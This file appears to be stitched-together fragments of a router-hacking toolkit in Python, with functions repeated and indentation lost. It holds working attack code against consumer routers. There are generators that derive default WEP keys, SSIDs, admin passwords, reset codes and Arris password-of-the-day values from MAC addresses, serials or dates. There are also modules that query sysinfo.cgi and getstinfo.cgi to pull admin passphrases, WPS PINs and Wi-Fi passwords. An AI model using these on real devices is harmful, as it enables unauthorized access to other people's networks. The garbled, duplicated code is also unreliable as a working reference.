a0 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
a1 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
a2 = [0, 13, 10, 7, 5, 8, 15, 2, 10, 7, 0, 13, 15, 2, 5, 8]
a3 = [0, 1, 3, 2, 7, 6, 4, 5, 15, 14, 12, 13, 8, 9, 11, 10]
a4 = [0, 5, 11, 14, 7, 2, 12, 9, 15, 10, 4, 1, 8, 13, 3, 6]
a5 = [0, 4, 8, 12, 0, 4, 8, 12, 0, 4, 8, 12, 0, 4, 8, 12]
a6 = [0, 1, 3, 2, 6, 7, 5, 4, 12, 13, 15, 14, 10, 11, 9, 8]
a7 = [0, 8, 0, 8, 1, 9, 1, 9, 2, 10, 2, 10, 3, 11, 3, 11]
a8 = [0, 5, 11, 14, 6, 3, 13, 8, 12, 9, 7, 2, 10, 15, 1, 4]
a9 = [0, 9, 2, 11, 5, 12, 7, 14, 10, 3, 8, 1, 15, 6, 13, 4]
a10 = [0, 14, 13, 3, 11, 5, 6, 8, 6, 8, 11, 5, 13, 3, 0, 1, 4]
a11 = [0, 12, 8, 4, 1, 13, 9, 5, 2, 14, 10, 6, 3, 15, 11, 7]
a12 = [0, 4, 9, 13, 2, 6, 11, 15, 4, 0, 13, 9, 6, 2, 15, 11]
a13 = [0, 8, 1, 9, 3, 11, 2, 10, 6, 14, 7, 15, 5, 13, 4, 12]
a14 = [0, 1, 3, 2, 7, 6, 4, 5, 14, 15, 13, 12, 9, 8, 10, 11]
a15 = [0, 1, 3, 2, 6, 7, 5, 4, 13, 12, 14, 15, 11, 10, 8, 9]
n1 = [0, 14, 10, 4, 8, 6, 2, 12, 0, 14, 10, 4, 8, 6, 2, 12]
n2 = [0, 8, 0, 8, 3, 11, 3, 11, 6, 14, 6, 14, 5, 13, 5, 13]
n3 = [0, 0, 3, 3, 2, 2, 1, 1, 4, 4, 7, 7, 6, 6, 5, 5]
n4 = [0, 11, 12, 7, 15, 4, 3, 8, 14, 5, 2, 9, 1, 10, 13, 6]
n5 = [0, 5, 1, 4, 6, 3, 7, 2, 12, 9, 13, 8, 10, 15, 11, 14]
n6 = [0, 14, 4, 10, 11, 5, 15, 1, 6, 8, 2, 12, 13, 3, 9, 7]
n7 = [0, 9, 0, 9, 5, 12, 5, 12, 10, 3, 10, 3, 15, 6, 15, 6]
n8 = [0, 5, 11, 14, 2, 7, 9, 12, 12, 9, 7, 2, 14, 11, 5, 0]
n9 = [0, 0, 0, 0, 4, 4, 4, 4, 0, 0, 0, 0, 4, 4, 4, 4]
n10 = [0, 8, 1, 9, 3, 11, 2, 10, 5, 13, 4, 12, 6, 14, 7, 15]
n11 = [0, 14, 13, 3, 9, 7, 4, 10, 6, 8, 11, 5, 15, 1, 2, 12]
n12 = [0, 13, 10, 7, 4, 9, 14, 3, 10, 7, 0, 13, 14, 3, 4, 9]
n13 = [0, 1, 3, 2, 6, 7, 5, 4, 15, 14, 12, 13, 9, 8, 10, 11]
n14 = [0, 1, 3, 2, 4, 5, 7, 6, 12, 13, 15, 14, 8, 9, 11, 10]
n15 = [0, 6, 12, 10, 9, 15, 5, 3, 2, 4, 14, 8, 11, 13, 7, 1]
n16 = [0, 11, 6, 13, 13, 6, 11, 0, 11, 0, 13, 6, 6, 13, 0, 11]
n17 = [0, 12, 8, 4, 1, 13, 9, 5, 3, 15, 11, 7, 2, 14, 10, 6]
n18 = [0, 12, 9, 5, 2, 14, 11, 7, 5, 9, 12, 0, 7, 11, 14, 2]
n19 = [0, 6, 13, 11, 10, 12, 7, 1, 5, 3, 8, 14, 15, 9, 2, 4]
n20 = [0, 9, 3, 10, 7, 14, 4, 13, 14, 7, 13, 4, 9, 0, 10, 3]
n21 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
n22 = [0, 1, 2, 3, 5, 4, 7, 6, 11, 10, 9, 8, 14, 15, 12, 13]
n23 = [0, 7, 15, 8, 14, 9, 1, 6, 12, 11, 3, 4, 2, 5, 13, 10]
n24 = [0, 5, 10, 15, 4, 1, 14, 11, 8, 13, 2, 7, 12, 9, 6, 3]
n25 = [0, 11, 6, 13, 13, 6, 11, 0, 10, 1, 12, 7, 7, 12, 1, 10]
n26 = [0, 13, 10, 7, 4, 9, 14, 3, 8, 5, 2, 15, 12, 1, 6, 11]
n27 = [0, 4, 9, 13, 2, 6, 11, 15, 5, 1, 12, 8, 7, 3, 14, 10]
n28 = [0, 14, 12, 2, 8, 6, 4, 10, 0, 14, 12, 2, 8, 6, 4, 10]
n29 = [0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3]
n30 = [0, 15, 14, 1, 12, 3, 2, 13, 8, 7, 6, 9, 4, 11, 10, 5]
n31 = [0, 10, 4, 14, 9, 3, 13, 7, 2, 8, 6, 12, 11, 1, 15, 5]
n32 = [0, 10, 5, 15, 11, 1, 14, 4, 6, 12, 3, 9, 13, 7, 8, 2]
n33 = [0, 4, 9, 13, 3, 7, 10, 14, 7, 3, 14, 10, 4, 0, 13, 9]
key = [30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 61, 62, 63, 64, 65, 66]
ssid = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'a', 'b', 'c', 'd', 'e', 'f']
s1 = (n1[mac_array[0]]) ^ (a4[mac_array[1]]) ^ (a6[mac_array[2]]) ^ (a1[mac_array[3]]) ^ \
(a11[mac_array[4]]) ^ (n20[mac_array[5]]) ^ (a10[mac_array[6]]) ^ (a4[mac_array[7]]) ^ \
(a8[mac_array[8]]) ^ (a2[mac_array[9]]) ^ (a5[mac_array[10]]) ^ (a9[mac_array[11]]) ^ 5
s2 = (n2[mac_array[0]]) ^ (n8[mac_array[1]]) ^ (n15[mac_array[2]]) ^ (n17[mac_array[3]]) ^ \
(a12[mac_array[4]]) ^ (n21[mac_array[5]]) ^ (n24[mac_array[6]]) ^ (a9[mac_array[7]]) ^ \
(n27[mac_array[8]]) ^ (n29[mac_array[9]]) ^ (a11[mac_array[10]]) ^ (n32[mac_array[11]]) ^ 10
s3 = (n3[mac_array[0]]) ^ (n9[mac_array[1]]) ^ (a5[mac_array[2]]) ^ (a9[mac_array[3]]) ^ \
(n19[mac_array[4]]) ^ (n22[mac_array[5]]) ^ (a12[mac_array[6]]) ^ (n25[mac_array[7]]) ^ \
(a11[mac_array[8]]) ^ (a13[mac_array[9]]) ^ (n30[mac_array[10]]) ^ (n33[mac_array[11]]) ^ 11
s4 = (n4[mac_array[0]]) ^ (n10[mac_array[1]]) ^ (n16[mac_array[2]]) ^ (n18[mac_array[3]]) ^ \
(a13[mac_array[4]]) ^ (n23[mac_array[5]]) ^ (a1[mac_array[6]]) ^ (n26[mac_array[7]]) ^ \
(n28[mac_array[8]]) ^ (a3[mac_array[9]]) ^ (a6[mac_array[10]]) ^ (a0[mac_array[11]]) ^ 10
ya = (a2[mac_array[0]]) ^ (n11[mac_array[1]]) ^ (a7[mac_array[2]]) ^ (a8[mac_array[3]]) ^ \
(a14[mac_array[4]]) ^ (a5[mac_array[5]]) ^ (a5[mac_array[6]]) ^ (a2[mac_array[7]]) ^ \
(a0[mac_array[8]]) ^ (a1[mac_array[9]]) ^ (a15[mac_array[10]]) ^ (a0[mac_array[11]]) ^ 13
yb = (n5[mac_array[0]]) ^ (n12[mac_array[1]]) ^ (a5[mac_array[2]]) ^ (a7[mac_array[3]]) ^ \
(a2[mac_array[4]]) ^ (a14[mac_array[5]]) ^ (a1[mac_array[6]]) ^ (a5[mac_array[7]]) ^ \
(a0[mac_array[8]]) ^ (a0[mac_array[9]]) ^ (n31[mac_array[10]]) ^ (a15[mac_array[11]]) ^ 4
yc = (a3[mac_array[0]]) ^ (a5[mac_array[1]]) ^ (a2[mac_array[2]]) ^ (a10[mac_array[3]]) ^ \
(a7[mac_array[4]]) ^ (a8[mac_array[5]]) ^ (a14[mac_array[6]]) ^ (a5[mac_array[7]]) ^ \
(a5[mac_array[8]]) ^ (a2[mac_array[9]]) ^ (a0[mac_array[10]]) ^ (a1[mac_array[11]]) ^ 7
yd = (n6[mac_array[0]]) ^ (n13[mac_array[1]]) ^ (a8[mac_array[2]]) ^ (a2[mac_array[3]]) ^ \
(a5[mac_array[4]]) ^ (a7[mac_array[5]]) ^ (a2[mac_array[6]]) ^ (a14[mac_array[7]]) ^ \
(a1[mac_array[8]]) ^ (a5[mac_array[9]]) ^ (a0[mac_array[10]]) ^ (a0[mac_array[11]]) ^ 14
ye = (n7[mac_array[0]]) ^ (n14[mac_array[1]]) ^ (a3[mac_array[2]]) ^ (a5[mac_array[3]]) ^ \
(a2[mac_array[4]]) ^ (a10[mac_array[5]]) ^ (a7[mac_array[6]]) ^ (a8[mac_array[7]]) ^ \
(a14[mac_array[8]]) ^ (a5[mac_array[9]]) ^ (a5[mac_array[10]]) ^ (a2[mac_array[11]]) ^ 7
key_string = str(key[ya]) + str(key[yb]) + str(key[yc]) + str(key[yd]) + str(key[ye])
ssid_string = str(ssid[s1]) + str(ssid[s2]) + str(ssid[s3]) + str(ssid[s4])
print_success("")
print_green("SSID:" + ssid_string)
print_green("WEP Key:" + key_string)
def do_run(self, e):
payload = self.keygen()
print_success("")
print_green("Payload:%s" % (hexlify(payload).decode()))
core.io.writefile(payload, "payload.hex")
print_green("Payload saved to payload.hex")
def do_run(self, e):
f = open(self.input_file, 'rb')
data = f.read()
f.close()
core.io.writefile(self.extract_config_xml(data), "config.xml")
print_green("Config.bin extracted to config.xml")
def decompress_fs_only(self, data, path):
"""Decompress filesystem"""
fsstart = unpack('>L', data[:4])[0]
print_green('FS block start at: %d [0x%08X]' % (fsstart, fsstart))
return self.decompress_fs(data[fsstart:], path)
def do_set(self, e):
args = e.split(' ')
if args[0] == "serial":
self.serial = args[1]
print_green("Serial number set to: " + self.serial)
def do_run(self, e):
m = hashlib.md5()
m.update(bytearray.fromhex(self.serial) + b'\x00'*12 + "kdf04rasdfKKduzA".encode('utf-8'))
code = m.hexdigest()
print_green("Reset code: " + code)
def do_run(self, e):
xmac = unhexlify(bytes(re.sub("[:\-]", "", self.mac), "UTF-8"))
print_success("credentials generated")
print_green("Username: Admin")
print_green("Password: " + self.spkeygen(xmac))
def do_run(self, e):
payload = self.keygen()
print_success("")
print_green("Payload:%s" % (hexlify(payload).decode()))
core.io.writefile(payload, "payload.hex")
print_green("Payload saved to payload.hex")
def generate_arris_password(self, start_date_str, end_date_str):
seed = 'MPSJKMDHAI'
seed_eight = seed[:8]
table1 = [[15, 15, 24, 20, 24],
[13, 14, 27, 32, 10],
[29, 14, 32, 29, 24],
[23, 32, 24, 29, 29],
[14, 29, 10, 21, 29],
[34, 27, 16, 23, 30],
[14, 22, 24, 17, 13]]
table2 = [[0, 1, 2, 9, 3, 4, 5, 6, 7, 8],
[1, 4, 3, 9, 0, 7, 8, 2, 5, 6],
[7, 2, 8, 9, 4, 1, 6, 0, 3, 5],
[6, 3, 5, 9, 1, 8, 2, 7, 4, 0],
[4, 7, 0, 9, 5, 2, 3, 1, 8, 6],
[5, 6, 1, 9, 8, 0, 4, 3, 2, 7]]
alphanum = [
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D',
'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',
'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'
]
list1 = [0]*8
list2 = [0]*9
list3 = [0]*10
list4 = [0]*10
list5 = [0]*10
start_date = datetime.datetime.strptime(start_date_str, "%Y-%m-%d")
end_date = datetime.datetime.strptime(end_date_str, "%Y-%m-%d")
for single_date in daterange(start_date, end_date):
year = int(single_date.strftime("%y"))
month = int(single_date.strftime("%m"))
day_of_month = int(single_date.strftime("%d"))
day_of_week = int(single_date.strftime("%w")) - 1
if day_of_week < 0:
day_of_week = 6
for i in range(5):
list1[i] = table1[day_of_week][i]
list1[5] = day_of_month
if ((year + month) - day_of_month) < 0:
list1[6] = (((year + month) - day_of_month) + 36) % 36
else:
list1[6] = ((year + month) - day_of_month) % 36
list1[7] = (((3 + ((year + month) % 12)) * day_of_month) % 37) % 36
for i in range(8):
list2[i] = ord(seed_eight[i]) % 36
for i in range(8):
list3[i] = (list1[i] + list2[i]) % 36
list3[8] = (list3[0] + list3[1] + list3[2] + list3[3] + list3[4] + list3[5] + list3[6] + list3[7]) % 36
num8 = list3[8] % 6
list3[9] = math.floor(math.pow(num8, 2) + 0.5) # Round to nearest integer
for i in range(10):
list4[i] = list3[table2[num8][i]]
for i in range(10):
list5[i] = (ord(seed[i]) + list4[i]) % 36
password_list = [""]*10
for i in range(10):
password_list[i] = alphanum[list5[i]]
password = "".join(password_list)
print_success("")
print_green("Date: " + single_date.date().isoformat() + " Password:" + password)
def do_run(self, e):
print_yellow("Sending payload sysinfo")
result = self.send_payload("sysinfo.cgi")
if result:
print_green("Got system information, writing to file")
core.io.writetextfile(result, "sysinfo")
print_green("Analyzing sysinfo...")
regex = re.search("device::default_passphrase=(.*)", result)
if regex:
try:
print_green("Default admin passphrasse: " + regex.group(1))
except IndexError:
print_error("Unable to locate passphrasse")
regex = re.search("device::mac_addr=(.*)", result)
if regex:
try:
print_green("MAC: " + regex.group(1) + lookup_mac(regex.group(1)))
except IndexError:
print_error("Unable to locate MAC")
regex = re.search("device::default_ssid=(.*)", result)
if regex:
try:
print_green("Default SSID:: " + regex.group(1))
except IndexError:
print_error("Unable to locate default SSID")
regex = re.search("device::wps_pin=(.*)", result)
if regex:
try:
print_green("WPS Pin: " + regex.group(1))
except IndexError:
print_error("Unable to locate WPS pin")
regex = re.search("wl0_ssid=(.*)", result)
if regex:
try:
print_green("SSID: " + regex.group(1))
except IndexError:
print_error("Unable to locate SSID")
regex = re.search("wl0_passphrase=(.*)", result)
if regex:
try:
print_green("Passphrase: " + regex.group(1))
except IndexError:
print_error("Unable to locate passphrase")
regex = re.search("wl1_ssid=(.*)", result)
if regex:
try:
print_green("SSID: " + regex.group(1))
except IndexError:
print_error("Unable to locate SSID")
regex = re.search("wl1_passphrase=(.*)", result)
if regex:
try:
print_green("Passphrase: " + regex.group(1))
except IndexError:
print_error("Unable to locate passphrase")
print_yellow("Sending payload getstinfo")
result = self.send_payload("getstinfo.cgi")
if result:
print_green("Got SSID hash and passphrase hash, writing to file")
core.io.writetextfile(result, "getstinfo")
print_green(result)
def do_run(self, e):
print_warning("Sending payload sysinfo")
result = self.send_payload("sysinfo.cgi")
if result:
print_success("Got system information, writing to file")
core.io.writetextfile(result, "sysinfo")
print_info("Analyzing sysinfo...")
regex = re.search("device::default_passphrase=(.*)", result)
if regex:
try:
print_green("Default admin passphrasse: " + regex.group(1))
except IndexError:
print_error("Unable to locate passphrasse")
regex = re.search("device::mac_addr=(.*)", result)
if regex:
try:
print_green("MAC: " + regex.group(1) +
lookup_mac(regex.group(1)))
except IndexError:
print_error("Unable to locate MAC")
regex = re.search("device::default_ssid=(.*)", result)
if regex:
try:
print_green("Default SSID:: " + regex.group(1))
except IndexError:
print_error("Unable to locate default SSID")
regex = re.search("device::wps_pin=(.*)", result)
if regex:
try:
print_green("WPS Pin: " + regex.group(1))
except IndexError:
print_error("Unable to locate WPS pin")
regex = re.search("wl0_ssid=(.*)", result)
if regex:
try:
print_green("SSID: " + regex.group(1))
except IndexError:
print_error("Unable to locate SSID")
regex = re.search("wl0_passphrase=(.*)", result)
if regex:
try:
print_green("Passphrase: " + regex.group(1))
except IndexError:
print_error("Unable to locate passphrase")
regex = re.search("wl1_ssid=(.*)", result)
if regex:
try:
print_green("SSID: " + regex.group(1))
except IndexError:
print_error("Unable to locate SSID")
regex = re.search("wl1_passphrase=(.*)", result)
if regex:
try:
print_green("Passphrase: " + regex.group(1))
except IndexError:
print_error("Unable to locate passphrase")
print_yellow("Sending payload getstinfo")
result = self.send_payload("getstinfo.cgi")
if result:
print_success("Got SSID hash and passphrase hash, writing to file")
core.io.writetextfile(result, "getstinfo")
print_success(result)
def do_run(self, e):
f = open(self.input_file, 'rb')
data = f.read()
f.close()
core.io.writefile(self.extract_config_xml(data), "config.xml")
print_green("Config.bin extracted to config.xml")
